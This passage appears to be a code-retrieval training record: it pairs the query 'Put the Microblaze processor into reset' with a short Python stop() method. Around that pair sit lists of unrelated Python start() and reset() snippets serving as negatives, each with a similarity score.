self.model.initialise(args[0])\n self.model.run()", "def start(self):\n\t\treturn Job(SDK.PrlVm_Start(self.handle)[0])", "def start(self):\n with self._lock:\n if not self.started():\n self._started = None\n getattr(self.factory, 'start_' + self.class_name())(self)", "def start(self):\n self.start_time = dt.datetime.now()\n self.call = ' '.join(sys.argv)\n self.commands = []", "def initialize_multiprocessing() -> None:\n global LOCK\n try:\n multiprocessing.set_start_method(\"fork\")\n except AttributeError:\n # Unsupported set_start_method (python 2 mainly).\n # Use default start method.\n pass\n except RuntimeError:\n # Already initialized\n pass\n manager = multiprocessing.Manager()\n LOCK = manager.RLock()", "def start(self):\r\n return self.start_subprocess()", "def _startup(self):\n self._logger.debug(\"About to start up plugin %s\", self.unique_name)\n\n if not self._ez_client.can_connect():\n raise RestConnectionError(\"Cannot connect to the Beer-garden server\")\n\n # If namespace couldn't be determined at init try 
one more time\n if not self._legacy and not self._config.namespace:\n self._setup_namespace()\n\n self._system = self._initialize_system()\n self._instance = self._initialize_instance()\n\n if self._config.working_directory is None:\n app_parts = [self._system.name, self._instance.name]\n if self._system.namespace:\n app_parts.insert(0, self._system.namespace)\n\n self._config.working_directory = appdirs.user_data_dir(\n appname=os.path.join(*app_parts), version=self._system.version\n )\n\n workdir = Path(self._config.working_directory)\n if not workdir.exists():\n workdir.mkdir(parents=True)\n\n self._logger.debug(\"Initializing and starting processors\")\n self._admin_processor, self._request_processor = self._initialize_processors()\n self._admin_processor.startup()\n self._request_processor.startup()\n\n self._logger.debug(\"Setting signal handlers\")\n self._set_signal_handlers()", "def startBackend():\n global started\n if started:\n return\n started = True\n print(\"Backend started\")", "def run(self):\n self.__power_on()\n\n self.__main()", "def start_core(c):\n with c.cd('images'):\n print('Starting Core database')\n c.run('sudo docker-compose up -d stellar-core-db', hide='stderr')\n sleep(2)\n\n # setup core database\n # https://www.stellar.org/developers/stellar-core/software/commands.html\n print('Initializing Core database')\n c.run('sudo docker-compose run stellar-core --newdb --forcescp', hide='both')\n\n # setup cache history archive\n print('Initializing Core history archive')\n c.run('sudo docker-compose run stellar-core --newhist cache', hide='both')\n\n # start a local private testnet core\n # https://www.stellar.org/developers/stellar-core/software/testnet.html\n print('Starting Core')\n c.run('sudo docker-compose up -d stellar-core', hide='stderr')", "def start(instance=\"default\"):\n # initialize logging\n global logger_ic\n logger_ic = infrasim_log.get_logger(LoggerType.ipmi_console.value, instance)\n common.init_logger(instance)\n\n # initialize environment\n env.local_env.quit_flag = False\n common.init_env(instance)\n pid_file = \"{}/{}/.ipmi_console.pid\".format(config.infrasim_home, instance)\n daemon.daemonize(pid_file)\n with open(pid_file, \"r\") as fp:\n logger_ic.info(\"ipmi-console of {} start with pid {}\".\n format(instance, fp.read().strip()))\n\n # parse the sdrs and build all sensors\n sdr.parse_sdrs()\n\n # running thread for each threshold based sensor\n _start_monitor(instance)\n _spawn_sensor_thread()\n _start_console(instance)", "def StartMicrophone(self):\n if not os.path.exists('static'):\n os.mkdir('static')\n microphone = olpc.Microphone('static/sound.ogg')\n microphone.StartMicrophone()", "def start(self) -> None:\n ...", "def start(self) -> None:\n ...", "def start():\n log(\"=========== hook: start ===========\")", "def start():\n trio.run(_main)", "def do_start(self, line):\n\n if not line:\n line = \"cortex\"\n\n # First, check that the name isn't already taken\n clients = self.registry.get_clients()\n if clients.has_key(line):\n print \"A server already exists with that name (%s)\" % line\n return False\n\n subprocess.Popen([\"python\", \"cortex.py\", line])\n # Wait for the system to init\n time.sleep(1)\n print \"Started server, connecting...\"\n return self.do_connect(line)", "def start(self):\n# if self._start_time is not None:\n self._start_time = time.perf_counter()", "def start(self):\n if not self._worker:\n # the worker might be already created in case of deserialization\n self._worker = APIWorker(self.queue)\n 
self._worker.start()", "def startService(self):\n super(MasterService, self).startService()\n self.dispatcher.startDispatching()", "def Start(self):\r\n # Attach a WorkerDispatcher to the current thread\r\n self.m_disp = ttapi.Dispatcher.AttachWorkerDispatcher()\r\n self.m_disp.BeginInvoke(Action(self.Init))\r\n self.m_disp.Run()", "def Start(self):\r\n # Attach a WorkerDispatcher to the current thread\r\n self.m_disp = ttapi.Dispatcher.AttachWorkerDispatcher()\r\n self.m_disp.BeginInvoke(Action(self.Init))\r\n self.m_disp.Run()", "def begin(self):\n self.service = NoseServiceClass()\n\n self.service.init_service(endpoint=self.rp_endpoint,\n project=self.rp_project,\n token=self.rp_uuid,\n ignore_errors=False)\n\n\n # Start launch.\n self.launch = self.service.start_launch(name=self.rp_launch,\n description=self.rp_launch_description,\n mode=self.rp_mode)\n\n self.handler = RPNoseLogHandler(self.filters if self.filters else None)\n self.setupLoghandler()", "def start_processing(self):\n\t\tlogger.info(\"Server processing started.\")\n\t\tThread(name='Server Processing Thread', target=self.__process_requests,\n\t\t\tdaemon=True).start()", "def start(self):\n if self._pumping:\n return\n self._pumping = True\n self._global_reactor.callLater(0, self._pump_once)", "def start(self):\n self.__current_evaluation_context = self.agent.evaluation_context.create_child_context()\n self.current_evaluation_context.set_process(self)\n self.procedure.restart(self.__current_evaluation_context)\n self.__current_control_node = self.procedure.body\n self.__last_start_time = self.agent.evaluation_context.get_current_time()\n\n self._on_start()\n self.__state = Process.RUNNING", "def start (self):\n pass", "def start (self):\n pass", "def start(self):\n self.log('Start capturing.')\n # ---\n try:\n self.setup()\n # run camera thread\n self._worker = Thread(target=self.run)\n self._worker.start()\n except StopIteration:\n self.log('Exception thrown.')", "def start(self):\n return self.setup.start", "def start_instance(InstanceId=None):\n pass", "def _start(self):\n pass", "def startReactor(self):\n reactor = self.options.get(RunnerOptions.reactor)\n if reactor is None:\n reactor = defaultReactor\n reactor.install()\n self.options[RunnerOptions.reactor] = reactor\n\n reactor.callWhenRunning(self.whenRunning)\n\n self.log.info(\"Starting reactor...\")\n reactor.run()", "def start(self, **kwargs):\n pass", "def start(self, **kwargs):\n pass", "def start_as_service(self):\n from ..program_manager import ProgramManager\n send_action(ProgramManager.NAME, 'start', self.name)", "def start(self) -> None:\n if self.bolt_app.logger.level > logging.INFO:\n print(get_boot_message())\n else:\n self.bolt_app.logger.info(get_boot_message())\n\n web.run_app(self.web_app, host=\"0.0.0.0\", port=self.port)", "def run(self):\n self.log.info(\"Starting thread: \" + self.name)\n self.object__ = self.run_process(self.object__, self.args)", "def start(self):\n \n self.thread.start()\n self.state = \"running\"", "def initialize_cpu(self):\n\n self.pc = self.memory.read(0xfffc) << 8 | self.memory.read(0xfffd)", "def start():", "def start():", "def start():", "def start():", "def start(self):\n self._thread.start()", "def start(self):\n\t\tself.init_trajectory_gripper()\n\t\tself.gripperserver.start()\n\t\tprint(\"The action server for this driver has been started\")", "def start( self ):\n while not os.path.exists( '/tmp/cloud-init.done' ):\n log.info( \"Waiting for cloud-init to finish ...\" )\n time.sleep( 1 )\n log.info( \"Starting 
mesosbox\" )\n self.__setup_etc_hosts( )\n self.__mount_ebs_volume( )\n self.__create_lazy_dirs( )\n\n if self.master_ip == self.node_ip:\n node_type = 'master'\n self.__publish_host_key( )\n else:\n node_type = 'slave'\n self.__get_master_host_key( )\n self.__wait_for_master_ssh( )\n if self.shared_dir:\n self._copy_dir_from_master( self.shared_dir )\n self.__prepare_slave_args( )\n\n log.info( \"Starting %s services\" % node_type )\n check_call( [ initctl, 'emit', 'mesosbox-start-%s' % node_type ] )", "def start(verbose=False):\n\n _load_config_and_logger(verbose)\n _validate_manager_installed('start')\n logger.notice('Starting Cloudify Manager services...')\n for component in COMPONENTS:\n if hasattr(component, 'start'):\n component.start()\n logger.notice('Cloudify Manager services successfully started!')\n _print_time()", "def start(self):\n\n if self.bus_controller == None:\n print(\"connection to the bus controller not established yet\")\n return\n if self.__gui == None:\n print(\"connection to the GUI not established yet\")\n return\n if self.__message_sender == None:\n print(\"Connection to the message sender not established yet\")\n return\n\n update_tracking_thread = threading.Thread(target=self.__luanch_handlers, args=(),\n name=\"Telegram Controller thread\")\n update_tracking_thread.start()", "def _start(self):\n if self._classifier is None:\n self._classifier = TFSlimClassifier(self.config)\n self._classifier.__enter__()", "def run():\n import argparse\n\n parser = argparse.ArgumentParser(description='Phovea Server')\n parser.add_argument('--use_reloader', action='store_true', help='whether to automatically reload the server')\n parser.add_argument('--env', default=cc.get('env'), help='environment mode (dev or prod)')\n\n # parse before to enable correct plugin discovery\n args = parser.parse_known_args()[0]\n if args.env.startswith('dev'):\n enable_dev_mode()\n else:\n enable_prod_mode()\n\n # resolve the default command to decide which application to launch\n default_command = _resolve_commands(parser)\n if default_command is not None:\n # set a default subparse to extract the defined arguments from the instance to the main arguments (?)\n set_default_subparser(parser, default_command)\n\n args = parser.parse_args()\n\n _set_runtime_infos(args)\n\n main = args.launcher(args) # execute the launcher function, which returns another function\n\n if args.use_reloader:\n _log.info('start application using reloader...')\n run_with_reloader(main, extra_files=_config_files())\n else:\n _log.info('start application...')\n main()", "def start(self):\n\n # Get memory usage in bytes as of the current moment.\n self.init_mem = Memory._get_resident_memory_in_bytes()", "def start():\n\tglobal StoreWorkerThread\n\n\tStoreWorkerThreadLock.acquire()\n\t# sanity - make sure thread is not already running\n\tif StoreWorkerThread is not None:\n\t\tStoreWorkerThreadLock.release()\n\t\traise WikStoreQError(\"start() called while StoreWorkerThread active!\")\n\t\t\n\t# start thread\n\tStoreWorkerThread = StoreWorker()\n\tStoreWorkerThread.start()\n\t\n\tStoreWorkerThreadLock.release()", "def start(self):\n ...", "def start(self):\n pass", "def start(self):\n pass", "def start(self):\n pass" ]
[ "0.6218762", "0.60426116", "0.5927747", "0.5888535", "0.5852811", "0.58245885", "0.5803731", "0.57714486", "0.57650065", "0.5744394", "0.5729824", "0.5724727", "0.5718365", "0.5661167", "0.5647819", "0.5586553", "0.5540475", "0.553082", "0.551599", "0.5512633", "0.5512412", "0.5510244", "0.5494249", "0.549061", "0.5490138", "0.5489092", "0.5472116", "0.5468504", "0.54674816", "0.54644006", "0.5445352", "0.5432914", "0.54196924", "0.54089874", "0.5407884", "0.53918624", "0.5388139", "0.53792703", "0.5373922", "0.5372847", "0.53622764", "0.5357195", "0.5357045", "0.53514916", "0.5344063", "0.5341714", "0.5340021", "0.53381425", "0.53374094", "0.5336009", "0.532934", "0.532808", "0.53257185", "0.5321936", "0.5306897", "0.52824575", "0.52824575", "0.5280214", "0.5254875", "0.52514714", "0.52469224", "0.52444226", "0.5242066", "0.52413654", "0.52413654", "0.52378774", "0.52350116", "0.5231117", "0.52309525", "0.52283", "0.52283", "0.52260876", "0.5225652", "0.522511", "0.522179", "0.5210307", "0.52059555", "0.52059555", "0.5201363", "0.51984805", "0.51976955", "0.5194438", "0.51914865", "0.51888907", "0.51888907", "0.51888907", "0.51888907", "0.51865274", "0.517917", "0.5176371", "0.5176078", "0.51755846", "0.516025", "0.51563907", "0.5150306", "0.5145154", "0.5145107", "0.5141277", "0.5141277", "0.5141277" ]
0.6880082
0
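The processor snippets in the row above all follow the same dependency-gated start pattern: check a status dictionary, refuse to launch unless Spark, ZooKeeper and Kafka report 'Running', then spawn the worker with subprocess.Popen. Below is a minimal sketch of that pattern; the service names and the command line are illustrative assumptions, not the original tool's API.

import subprocess
import sys

REQUIRED = ('spark<spark_worker>', 'spark<spark_master>', 'zookeeper', 'kafka')

def start_processor(name, cmd_line, running_dict):
    # Refuse to double-start a processor that is already up.
    if running_dict.get(name) == 'Running':
        print('%s is running; stop it before starting it again.' % name)
        return
    # All prerequisite services must be running first.
    stopped = [svc for svc in REQUIRED if running_dict.get(svc) != 'Running']
    if stopped:
        print('Please start these services first: %s' % ', '.join(stopped))
        return
    try:
        subprocess.Popen([cmd_line], shell=True, stderr=subprocess.PIPE)
        print('%s has been started' % name)
    except Exception as ex:
        print('Failed to run processor with ERROR(%s).' % str(ex))
        sys.exit(1)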
Put the Microblaze processor into reset. This method will set the processor status to "STOPPED".
def stop(self): self.microblaze.reset()
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def reset(self):\n # The camera will give no response to this command\n self._serial_io('\\x55\\x99\\x66\\x11', None)\n while True:\n try:\n self.system_state = 0x11\n if self.system_state == 0x11:\n break\n except CygnetExc:\n time.sleep(.2)\n while True:\n self.system_state = 0x12\n time.sleep(.2)\n if self.system_state == 0x16:\n break", "async def reset(self):\n await self.set_param(\"ContinuousExposures\", 0)\n await self.set_param(\"Exposures\", 0)\n cmd = await self.send_command(\"RESETTIMING\", timeout=1)\n if not cmd.succeeded():\n self.status = ControllerStatus.ERROR\n raise ArchonError(f\"Failed sending RESETTIMING ({cmd.status.name})\")\n\n # TODO: here we should do some more checks before we say it's IDLE.\n self.status = ControllerStatus.IDLE", "def reset(self):\n\t\treturn Job(SDK.PrlVm_Reset(self.handle)[0])", "def reset(self):\n self.success = False\n self.i = 0\n if self.monitor:\n self.env = gym.wrappers.Monitor(self.env, \"./mountaincar-monitor\", force=True)\n state = self.env.reset()\n state = self.preprocess_state(state)\n state = np.concatenate([state] * self.action_repeat)\n return state", "def soft_reset():", "def reset():\n _runtime.reset()", "def reset(self):\n self.state = self.process_state(self.env.reset())\n return self.state", "def reset(self):\n with self.bkp_lock:\n self.active_breakpoints = set()\n self.stepping = SteppingMode.STEP_NO_STEP\n self.continue_next()", "def reset(self) -> None:\n # See section 7.2.2 of the datasheet for reset description.\n self._reset.value = True\n time.sleep(0.0001) # 100 us\n self._reset.value = False\n time.sleep(0.005) # 5 ms", "def reset(self):\n GPIO.output(self.reset_pin, GPIO.LOW)\n time.sleep(0.1)\n GPIO.output(self.reset_pin, GPIO.HIGH)\n time.sleep(0.1)\n\n if self.inky_version == 2:\n self._send_command(_V2_RESET)\n\n self._busy_wait()", "def reset(self):\n self.stop()\n self.start()", "def halt(self):\n cmd_title('HALTING')\n self.running = False\n # Reset any state\n self.tape = None\n self.transitions = None\n self.current_state = None\n self.tape_index = None\n self.result = ''", "def reset_and_stop(self):\n self.enabled = False\n self.start_time = None", "def svc_reset_system_mode(self) -> None:\n self._call_client_api(self._device.reset_mode)", "def test_reset():\n dev = _aws_device(wires=2)\n dev._circuit = CIRCUIT\n dev._task = TASK\n\n dev.reset()\n assert dev.circuit is None\n assert dev.task is None", "def reset():\n for cpu_id in POSSIBLE_CPUS:\n set_cpu(cpu_id, True)", "def set_working_state(self):\n self.state = 0\n self.port = None", "def reset(self):\n# \n self.end_and_close()\n# self.sim.start()\n\n # Start the next simulation\n self.sim._model.swmm_open()\n self.sim._model.swmm_start()\n\n # get the state\n state = self._state()\n return state", "def reset(self):\n command = \"export STLINK_DEVICE=\" + self.stlink.port + \"; st-flash reset\"\n subprocess.run(command, shell=True)\n time.sleep(1)", "def reset(self):\n self.write_to_serial('*RST')", "def reset(self):\r\n _debug('simq03b_api.reset')\r\n self.write('*RST')\r\n self.query('*IDN?') # Pauses operation until fully reset?\r", "def reset(self):\n error_estop = \"\"\"\\\nE-Stop is ASSERTED. Disengage E-Stop and then reset the robot.\n\"\"\"\n error_nonfatal = \"\"\"Non-fatal Robot Error on reset.\nRobot reset cleared stopped state and robot can be enabled, but a non-fatal\nerror persists. 
Check diagnostics or rethink.log for more info.\n\"\"\"\n error_env = \"\"\"Failed to reset robot.\nPlease verify that the ROS_IP or ROS_HOSTNAME environment variables are set\nand resolvable. For more information please visit:\nhttp://sdk.rethinkrobotics.com/wiki/RSDK_Shell#Initialize\n\"\"\"\n is_reset = lambda: (self._state.enabled == False and\n self._state.stopped == False and\n self._state.error == False and\n self._state.estop_button == 0 and\n self._state.estop_source == 0)\n pub = rospy.Publisher('robot/set_super_reset', Empty, queue_size=10)\n\n if (self._state.stopped and\n self._state.estop_button == AssemblyState.ESTOP_BUTTON_PRESSED):\n rospy.logfatal(error_estop)\n raise IOError(errno.EREMOTEIO, \"Failed to Reset: E-Stop Engaged\")\n\n rospy.loginfo(\"Resetting robot...\")\n try:\n baxter_dataflow.wait_for(\n test=is_reset,\n timeout=3.0,\n timeout_msg=error_env,\n body=pub.publish\n )\n except OSError as e:\n if e.errno == errno.ETIMEDOUT:\n if self._state.error == True and self._state.stopped == False:\n rospy.logwarn(error_nonfatal)\n return False\n raise", "def reset(self):\n\n # Deactivate the card\n try:\n result = self.mch_comms.call_ipmitool_command([\"picmg\", \"deactivate\", (str(self.slot + PICMG_SLOT_OFFSET))])\n except CalledProcessError:\n pass\n except TimeoutExpired as e:\n print(\"reset: caught TimeoutExpired exception: {}\".format(e))\n\n # TODO: Add a resetting status here to allow other reads to wait\n # See DIAG-68.\n\n # Wait for the card to shut down\n time.sleep(2.0)\n\n # Activate the card\n try:\n result = self.mch_comms.call_ipmitool_command([\"picmg\", \"activate\", str(self.slot + PICMG_SLOT_OFFSET)])\n except CalledProcessError:\n pass\n except TimeoutExpired as e:\n print(\"reset: caught TimeoutExpired exception: {}\".format(e))", "def resetDeviceStates(self):", "def reset(self,):\n\n self._toggle_pin(RESET_PIN)", "def reset(self, sync=True):\n self.vmomi_object.ResetVM_Task()\n if sync: self._wait_for_power_on()", "def reset(self):\n\n ## Turn off controller to bring to a known state\n try:\n self.logger.info(\"Turning off sta3800 controller (sta3800_off).\")\n ccdsetup.sta3800_off()\n except Exception:\n self.logger.exception(\"Unable to turn off controller! 
State may be unknown.\")\n raise\n else:\n self.logger.info(\"Controller turned off successfully.\")\n\n ## Initialize controller\n try:\n self.logger.info(\"Turning on sta3800 controller (sta3800_setup).\")\n ccdsetup.sta3800_setup()\n except Exception:\n self.logger.exception(\"Unable to turn on sta3800 controller!\")\n raise\n else:\n self.logger.info(\"Controller turned on successfully.\")", "def reset(self):\n self.stuck = False", "def reset_to_cold(self):\n self._log_msg_start(\"CFG-RST - Reset to cold start\")\n self._ubx.send(\"CFG-RST\", navBbrMask=0xFFFF, resetMode=0x01)", "def handle_warm_resets():\n\n # If we're in USB reset, we're actively receiving warm reset signaling; and we should reset\n # to the Rx.Detect.Reset state.\n with m.If(self.in_usb_reset):\n transition_to_state(\"Rx.Detect.Reset\")", "def sys_reset(self):\n result = self._lib.NRFJPROG_sys_reset()\n if result != NrfjprogdllErr.SUCCESS:\n raise APIError(result)", "def soft_reset() -> None:\n ...", "def reset():\n s = State(sentiment=0, focus=0, energy=0, text=\"reset_triggered\")\n db.session.add(s)\n db.session.commit()\n return \"Reset the state to 0\"", "def reset(self, reset):\n\n self._reset = reset", "def reset_computer(self):\n self._greediness = 7\n self._rolls = 0", "def reset(self):\n self.reset_dev_via_serial(self.forced_reset_timeout)", "def reset(self):\n self.clock.reset()\n self.microgrid.reset();\n self.steps_beyond_done = None\n self.updateState();\n return self.state", "def reset(self):\n self._set_register_field(SI5324._FIELD_RST_TRG, 1)\n time.sleep(0.010) # Control interface up after 10ms", "def _reset_state(self):\n self.state = self.start_state.copy()", "def softreset(self):\n try:\n self.device.write(b'\\x03') # abort\n self.device.write(b'\\x04') # reset\n self.device.write(b'\\r')\n self.__read_until(b'raw REPL; CTRL-B to exit\\r\\n>')\n except Exception as e:\n raise ReplError(e)", "def _doReset(self):\n self._cmdReset()", "def Reset(self):\r\n #if self.originalState != self.currentState:\r\n # self._set_SS_State(self.originalState)\r\n #self.enable()\r\n self._set_SS_State(self.originalState)", "def reset(self):\n self.rst.value(0) # RST on\n self.sleep_us(100) # reset impulse has to be >100 ns and <100 ms\n self.rst.value(1) # RST off\n # Defaults after reset:\n self.power = self.POWER_DOWN\n self.addressing = self.ADDRESSING_HORIZ\n self.instr = self.INSTR_BASIC\n self.display_mode = self.DISPLAY_BLANK\n self.temp_coeff = self.TEMP_COEFF_0\n self.bias = self.BIAS_1_11\n self.voltage = 3060", "def shutdown(self):\n if self.pmu is not None:\n # Enable button checking before shutdown\n self.pmu.enablePMICSleepMode(True)\n self.pmu.setEnterSleepMode()\n machine.reset()\n sys.exit()", "def reset():\n pass", "def reset():\n pass", "def reset(self):\n self.state = self.start\n return self.start", "def reset(self):\n if self.arduino:\n self.arduino.stop()\n\n time.sleep(.5)\n\n self.arduino = arduino.find_arduino(self.arduino_serial)\n self.arduino.start_monitor()\n\n self.driver.stop()\n self.last_control = time.time()", "def bcp_reset(self):\n self.machine.bcp.transport.send_to_all_clients(\"reset\")", "def soft_reset(self):\n self.ser.write(\"\\030\")\n self._handle_reset()", "def set_reset_pin_low(self):\n self._dll.JLINKARM_ClrRESET()\n return None", "def reset(self):\n self.stop()\n self._queue = Queue.Queue()", "async def send_reset(self):\n try:\n await self._send_command([PrivateConstants.SYSTEM_RESET])\n except RuntimeError:\n exit(0)", "def stop():\n set_power(0)", "def 
reset(self):\n self.ipcon.send_request(self, BrickletBarometerV2.FUNCTION_RESET, (), '', '')", "def actionReset(self):\n sys.stderr.write(\"Reset device ...\\n\")\n sys.stderr.flush()\n self.bslReset(0) #only reset", "def resetVirtualMachine(self,node,vmid):\n post_data = None\n data = self.connect('post',\"nodes/%s/qemu/%s/status/reset\" % (node,vmid), post_data)\n return data", "def reset():\n Vessel.reset_instances()", "def _reset(self) -> ts.TimeStep:", "def stop(self):\n self.startState = None", "def stop(self):\n self.startState = None", "def pibooth_reset(cfg, hard):", "def __mode_reset(self):\n\t\tfor key,val in self.ms_all.iteritems():\n\t\t\tval.reset_restart()", "def device_reset(self):\n\t\tlogger.info('Device Reset')\n\t\tself.spi.writebytes([0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff])\n\t\tprint(DELIMITER*'-')", "def stop_device(self):\n\n self.state = 'stopped'", "async def send_reset(self):\n try:\n await self._send_command([PrivateConstants.SYSTEM_RESET])\n except RuntimeError:\n exit(0) #keep this??", "def reset_myself(self):\n print >>sys.stderr, 'UNEXPECTED VALUE'\n self.status = Modem.Status.IDLE\n self.error_status = Modem.ErrorDict.NONE", "def halt(self):\n self._kernel.halt()", "def reset(self):\n self.wait_until_idle()\n self.__interface.write_pin(self.__interface.RST_PIN, RPi.GPIO.LOW)\n time.sleep(self.__interface.WT_PIN_TOGGLE)\n self.__interface.write_pin(self.__interface.RST_PIN, RPi.GPIO.HIGH)\n time.sleep(self.__interface.WT_PIN_TOGGLE)\n\n self.__sleeping = False", "def reset():\r\n pass", "def reset(self):\n self.state = \"YYYYRRRRGGGGOOOOBBBBWWWW\"", "def reset(self):\n self.restart()\n self.cycles = 0", "def halt(self, addr):\n\n self.reg.run_flag = False", "def reset(self):\n \n pass", "def reset(self,bootloader=False):\n self.send_packet('\\xff' if bootloader else '\\xfe')", "async def reset(self):\n\n self.__do_action(self.motor.moveto_edge(MotorDriver.LEFT))", "def reset(self):\n\n\t\tself._send_message(\"RESET\", \"\\x00\")", "def resetDetector (self):\n self.mpr121._reset ()", "def _handle_reset(self):\n # reset own state\n self.grbl_version = None\n self.in_check_mode = False\n self.line_active = False\n # wait for init\n self._wait_for_grbl_init()", "def reset(self):\r\n err = self._cfuncs['ka_reset'](self._core._get_ka())\r\n self._core._handle_error(err)", "def _reset_state(self):\n\n self.state = None\n self.use_count = 0\n\n # Guards both state and use_count\n self.cond = threading.Condition()\n\n # Incremented each time we initialise a new mount state. 
Aids\n # debugging.\n self.generation = 0", "def reset_to_hot(self):\n self._log_msg_start(\"CFG-RST - Reset to hot start\")\n self._ubx.send(\"CFG-RST\", navBbrMask=0x0000, resetMode=0x01)", "def reset(self):\n # When we reset frame, all the value will be set to 0, so we need these lines.\n self.id = self._id\n self.cpu_cores_capacity = self._init_cpu_cores_capacity\n self.memory_capacity = self._init_memory_capacity\n self.pm_type = self._init_pm_type\n self.oversubscribable = self._init_pm_state\n\n self.region_id = self._region_id\n self.zone_id = self._zone_id\n self.data_center_id = self._data_center_id\n self.cluster_id = self._cluster_id\n self.rack_id = self._rack_id\n\n self._live_vms.clear()\n\n self.cpu_cores_allocated = 0\n self.memory_allocated = 0\n\n self.cpu_utilization = 0.0\n self.energy_consumption = self._idle_energy_consumption", "def reset(self) -> None:\n\n self.host.reset()", "def reset (self):\n\n self.currentState = self.initialState\n self.inputSymbol = None", "def _doResetMemory(self):\n self._cmdClearMemory()\n time.sleep(1)\n self._cmdResetParameters()\n time.sleep(1)", "def handle_reset(self):\n self.initialise()", "def stop(self):\n self.requested_state = 'Stopped'\n self.ml_interface.stop()", "def reset_10gbe():\n snap.write_int('valid_en',0)\n snap.write_int('rst',1)\n time.sleep(1)\n snap.write_int('rst',0)\n snap.write_int('valid_en',3)", "def __reset_variables(self):\r\n self.__running = True", "def reset(self):\n\n # Issue the reset command\n try:\n self.crate_resetting = True\n # Reset the FRU init status to stop attempts to read the sensors\n self.frus_inited = False\n # Wait a few seconds to allow any existing ipmitool requests to complete\n print(\"reset: Short wait before resetting (2 s)\")\n time.sleep(2.0)\n # Force the records to invalid\n print(\"reset: Force sensor read to set invalid\")\n self.read_sensors()\n print(\"reset: Triggering records to scan\")\n self.scan_list.interrupt()\n self.mch_comms.connected = False\n # Stop the ipmitool session. System will reconnect on restart\n self.mch_comms.ipmitool_shell.terminate()\n time.sleep(2.0)\n #print(\"reset: Killing ipmitool shell process\")\n self.mch_comms.ipmitool_shell.kill()\n self.mch_comms.ipmitool_shell = None\n # Stop the reader thread\n #print(\"reset: Stopping thread\")\n self.mch_comms.stop = True\n # Wait for the thread to stop\n self.mch_comms.t.join()\n #print(\"reset: Thread stopped\")\n self.mch_comms.t = None\n # Allow the thread to restart\n self.mch_comms.stop = False\n #print(\"reset: Exiting \")\n # Reset the crate\n print(\"reset: Resetting crate now\")\n self.mch_comms.call_ipmitool_direct_command([\"raw\", \"0x06\", \"0x03\"])\n\n except CalledProcessError:\n pass\n except TimeoutExpired as e:\n # Be silent. 
We expect this command to timeout.\n print('reset: reset command sent')\n pass\n\n # Reconnect to the crate\n print('reset: reconnecting')\n self.mch_comms.ipmitool_shell_reconnect()", "def reset(self, system):\r\n self.change_state(self.INITIAL)\r\n return {'success': True}", "def reset(self):\n self.iterator = 0\n if self.reset_jnts is True:\n # pause simulation\n while not self._physics_pauser.wait_for_service(timeout_sec=1.0):\n self.node.get_logger().info('/pause_physics service not available, waiting again...')\n pause_future = self._physics_pauser.call_async(Empty.Request())\n print(\"Pausing physics\")\n rclpy.spin_until_future_complete(self.node, pause_future)\n\n # reset controllers\n while not self._robot_resetter.wait_for_service(timeout_sec=1.0):\n self.node.get_logger().info('/lobot_arm/reset service not available, waiting again...')\n reset_robot_future = self._robot_resetter.call_async(Empty.Request())\n print(\"Resetting controller initial positions\")\n rclpy.spin_until_future_complete(self.node, reset_robot_future)\n\n # reset simulation\n while not self._reset_sim.wait_for_service(timeout_sec=1.0):\n self.node.get_logger().info('/reset_simulation service not available, waiting again...')\n reset_future = self._reset_sim.call_async(Empty.Request())\n print(\"Resetting simulation\")\n rclpy.spin_until_future_complete(self.node, reset_future)\n\n # unpause simulation\n while not self._physics_unpauser.wait_for_service(timeout_sec=1.0):\n self.node.get_logger().info('/unpause_physics service not available, waiting again...')\n unpause_future = self._physics_unpauser.call_async(Empty.Request())\n rclpy.spin_until_future_complete(self.node, unpause_future)\n print(\"Unpausing simulation\")", "def reset(self):\n self.observable_fsm.reset()\n self.latent_fsm.reset()", "def _reset(self):\n self.spot_supervisor.reset()\n return ts.TimeStep(ts.StepType.FIRST, np.float32(0.0), DISCOUNT,\n np.zeros(23, dtype=np.float32))", "def reset_stage():\n return set_stage('')", "def reset(self):\r\n # reset Wheel encoders\r\n self.start_time = time.time()\r\n [left_start, right_start] = self.Roomba.Query(43, 44)\r\n self.Motion.reset(left_start, right_start)\r\n # reset bumper\r\n self.bumper.reset()\r\n\r\n #reset grid world data\r\n self.action=[0.0,0.0]\r\n self.grid_state= [0,0,0]\r\n self.real_state = [0.0, 0.0, 0.0]\r\n self.trans_model = None\r\n pass", "def reset(self, condition):\n pass", "def reset(self):\n self.check_validity()\n\n self.ipcon.send_request(self, BrickletIndustrialDualAnalogInV2.FUNCTION_RESET, (), '', 0, '')", "def reset(self):\n p.resetSimulation()\n p.setPhysicsEngineParameter(numSolverIterations=150)\n p.setTimeStep(self._time_step)\n p.setGravity(0, 0, -9.8)\n\n # load plane\n p.loadURDF(os.path.join(pybullet_data.getDataPath(), \"plane.urdf\"), [0, 0, 0])\n # load robot\n self._darwin = DarwinopEnv()\n\n # Let the world run for a bit\n for _ in range(20):\n p.stepSimulation()" ]
[ "0.62783825", "0.6214647", "0.62101734", "0.62012935", "0.6188777", "0.6144242", "0.6094757", "0.60869604", "0.6043643", "0.6032759", "0.6026657", "0.6011027", "0.600109", "0.59982294", "0.5969956", "0.59564924", "0.5952704", "0.59244686", "0.5921813", "0.5914156", "0.59073234", "0.58894604", "0.58858716", "0.58761483", "0.5875608", "0.5830331", "0.58266324", "0.58210874", "0.58090645", "0.5803332", "0.5797521", "0.57603085", "0.5752144", "0.5751398", "0.5746973", "0.57440066", "0.5738513", "0.57364035", "0.57352793", "0.57268363", "0.57210606", "0.5720142", "0.57127", "0.57095593", "0.57018954", "0.57018954", "0.5701228", "0.57007444", "0.5697224", "0.56926465", "0.56882876", "0.5685538", "0.56818444", "0.56799155", "0.5677292", "0.5673814", "0.5673097", "0.5671458", "0.566866", "0.5667887", "0.5667887", "0.56671214", "0.56655616", "0.5652645", "0.56522506", "0.56454676", "0.5643074", "0.5642263", "0.56421393", "0.5641728", "0.5639157", "0.56367373", "0.5634135", "0.56289285", "0.5626999", "0.56247354", "0.5621839", "0.5620882", "0.5620549", "0.56075466", "0.5607404", "0.5607337", "0.5605469", "0.55994225", "0.5592151", "0.5591723", "0.5582854", "0.558012", "0.55790704", "0.5577152", "0.5576243", "0.5562824", "0.556266", "0.5559628", "0.5552715", "0.5549839", "0.5544613", "0.5542487", "0.55363595", "0.5534653" ]
0.70397276
0
